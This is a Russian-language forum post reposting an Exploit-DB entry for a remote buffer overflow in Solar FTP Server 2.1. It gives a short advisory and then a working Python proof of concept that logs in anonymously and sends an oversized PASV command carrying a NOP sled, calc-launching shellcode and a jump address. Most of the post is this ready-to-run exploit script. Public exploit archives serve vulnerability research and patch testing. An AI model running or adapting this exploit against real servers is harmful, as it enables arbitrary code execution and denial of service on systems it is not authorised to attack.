Exploit Solar FTP Server 2.1.1 - 'PASV' Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35188
Проверка EDB
  1. Пройдено
Автор
JOHN LEITCH
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2011-01-10
Код:
source: https://www.securityfocus.com/bid/45748/info

SolarFTP is prone to a buffer-overflow vulnerability.

An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

SolarFTP 2.1 is vulnerable; other versions may also be affected. 

# ------------------------------------------------------------------------
# Software................Solar FTP Server 2.1
# Vulnerability...........Buffer Overflow
# Download................http://www.solarftp.com/
# Release Date............1/10/2011
# Tested On...............Windows XP SP3 EN
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# [email protected]
# ------------------------------------------------------------------------
# 
# --Description--
# 
# A buffer overflow in Solar FTP Server 2.1 can be exploited to execute
# arbitrary code.
# 
# 
# --PoC--

import socket

host = 'localhost'

port = 21

jmp_eax = '\xBF\x66\x02\x10'

junk = '\xCC\xCC\xCC\xCC'

nop_sled = '\x90\x90\x90' + '\x90\x90\x90\x90' * 2

# Calc shellcode by yours truly. Check the task manager
# as the calc instance will not be visible.
shell_code = "\x31\xC9"\
             "\x51"\
             "\x68\x63\x61\x6C\x63"\
             "\x54"\
             "\xB8\xC7\x93\xC2\x77"\
             "\xFF\xD0"

junk2 = 'A' * 7004


bad_stuff = junk + nop_sled + shell_code + jmp_eax * 249 + junk2
    
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(8)

print 'connecting'

s.connect((host, port))

print s.recv(8192)

s.send('USER anonymous\r\n')
print s.recv(8192)

s.send('PASS [email protected]\r\n')
print s.recv(8192)

s.send('PASV ' + bad_stuff + '\r\n')
print s.recv(8192)
s.close()
 
Источник
www.exploit-db.com

Похожие темы